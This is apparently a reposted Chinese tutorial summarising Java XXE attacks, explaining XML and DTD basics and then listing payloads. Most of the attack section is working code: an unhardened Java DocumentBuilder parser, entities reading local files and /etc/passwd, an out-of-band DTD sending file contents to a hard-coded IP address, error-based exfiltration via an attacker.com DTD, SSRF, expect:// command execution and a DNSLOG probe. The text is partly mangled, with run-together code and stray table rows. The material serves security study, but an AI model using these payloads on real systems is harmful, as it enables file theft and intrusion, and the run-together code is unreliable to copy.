JAVA XXE 学习总结
XML 基础
XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
<!--XML申明--><?xml version="1.0"?><!--文档类型定义--><!DOCTYPE note [ <!--定义此文档是 note 类型的文档--><!ELEMENT note (to,from,heading,body)><!--定义note元素有四个元素--><!ELEMENT to (#PCDATA)><!--定义to元素为”#PCDATA”类型--><!ELEMENT from (#PCDATA)><!--定义from元素为”#PCDATA”类型--><!ELEMENT head (#PCDATA)><!--定义head元素为”#PCDATA”类型--><!ELEMENT body (#PCDATA)><!--定义body元素为”#PCDATA”类型-->]><!--文档元素--><note><to>Dave</to><from>Tom</from><head>Reminder</head><body>You are a good man</body></note>
xxe漏洞只与DTD文档类型定义有关,下面开始只需要关注DTD即可。
DTD
DTD 用于定义 XML 文档格式的一种规范,它声明了 XML 文档中允许的元素、属性、层级结构,确保 XML 文档格式正确性。
DTD 又分为外部 DTD 和内部 DTD,
<?xml version="1.0"?><!DOCTYPE note [<!ELEMENT note (to, from, heading, body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)>]><note><to>John</to><from>Jane</from><heading>Reminder</heading><body>Don't forget our meeting at 3 PM!</body></note><!ELEMENT note (to, from, heading, body)><!ELEMENT to (#PCDATA)><!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body (#PCDATA)><?xml version="1.0"?><!DOCTYPE note SYSTEM "note.dtd"><note><to>John</to><from>Jane</from><heading>Reminder</heading><body>Don't forget our meeting at 3 PM!</body></note><!DOCTYPE name SYSTEM "address.dtd" [...]><!DOCTYPE name PUBLIC "any text" "http://evil.com/evil.dtd">XXE 原理介绍
<!ENTITY name SYSTEM "URI/URL">% 或 & 进行引用,正是因为这些条件才使得我们能够进行实体注入。XXE 攻击
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
任意文件读取
package org.example;import javax.xml.parsers.DocumentBuilder;import javax.xml.parsers.DocumentBuilderFactory;import org.w3c.dom.Document;publicclass DOMXML {publicstaticvoid main(String[] args){try{DocumentBuilderFactory documentBuilderFactory =DocumentBuilderFactory.newInstance();DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();Document document = documentBuilder.parse("D:\JavaLearn\test\src\main\java\test.xml");String textContent = document.getDocumentElement().getTextContent();System.out.println(textContent);}catch(Exception e){ e.printStackTrace();}}}<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE file [ <!ENTITY xxe SYSTEM "file://D:/JavaLearn/test/src/main/java/flag.txt">]><root>&xxe;</root><?xml version="1.0" encoding="UTF-8"?><!DOCTYPE file [ <!ENTITY xxe SYSTEM "file://D:/JavaLearn/test/src/main/java/">]><root>&xxe;</root>
OOB XXE
package org.example;import javax.xml.parsers.DocumentBuilder;import javax.xml.parsers.DocumentBuilderFactory;import org.w3c.dom.Document;publicclass DOMXML {publicstaticvoid main(String[] args){try{DocumentBuilderFactory documentBuilderFactory =DocumentBuilderFactory.newInstance();DocumentBuilder documentBuilder = documentBuilderFactory.newDocumentBuilder();Document document = documentBuilder.parse("D:\JavaLearn\test\src\main\java\test.xml");String textContent = document.getDocumentElement().getTextContent();System.out.println(textContent);}catch(Exception e){ e.printStackTrace();}}}<!ENTITY % file SYSTEM "./flag.txt"><!ENTITY % define_http "<!ENTITY % send_http SYSTEM 'http://106.53.212.184:6666/%file;'>"><?xml version="1.0" encoding="utf-8"?><!DOCTYPE xdsec[ <!ENTITY % include SYSTEM "./test.dtd" >%include;%define_http;%send_http;]><books></books>%file 内容,% 就是%的实体编码,防止冲突报错,而且只有外部 dtd 文件才允许实体里面套实体<!ENTITY % define_http "<!ENTITY % send_http SYSTEM 'http://106.53.212.184:6666/%file;'>"><!ENTITY % define_http "<!ENTITY send_http SYSTEM 'http://106.53.212.184:6666/%file;'>">%define_http;然后利用&send_http;去引用
SSRF
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY url SYSTEM "http://192.168.116.1:90/" >]><xxe>&url;</xxe>RCE
expect:// 是一些配置不当导致的命令执行协议,如果目标内部的PHP环境中安装了expect扩展,并且该扩展被加载到了处理XML的内部应用程序上,就可以利用expect来执行系统命令。<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [ <!ENTITY url SYSTEM "expect://whoami" >]><xxe>&url;</xxe>基于报错回显
<?xml version="1.0"?><!DOCTYPE message [<!ENTITY % ext SYSTEM "http://attacker.com/test.dtd">%ext;]><message></message><!ENTITY % file SYSTEM "./flag.txt"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///abcxyz/%file;'>">%eval;%error;
利用本地 DTD 来利用盲目 XXE
%file 的内容。<!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of"><!ELEMENT pattern (%condition;)><?xml version="1.0"?><!DOCTYPE message [<!ENTITY % local_dtd SYSTEM "file://test.dtd"><!ENTITY % condition 'aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb'>%local_dtd;]><message>any text</message>condition 参数的值会进行覆盖'aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb'<!ENTITY % condition "aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb"><!ELEMENT pattern (aaa)><!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;<!ELEMENT aa (bb)>
通过修改内容类型进行 XXE 攻击
POST /action HTTP/1.0Content-Type: application/x-www-form-urlencodedContent-Length:7foo=barPOST /action HTTP/1.0Content-Type: application/xmlContent-Length:52<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>POST /action HTTP/1.1Content-Type: application/xml Content-Length:288<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><root></root><search>name</search><value>&xxe;</value></root>Excel文件导致XXE
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY url SYSTEM "http://DNSLOG/" >]><xxe>&url;</xxe>所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
原文始发于微信公众号(掌控安全EDU):JAVA XXE 学习总结
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论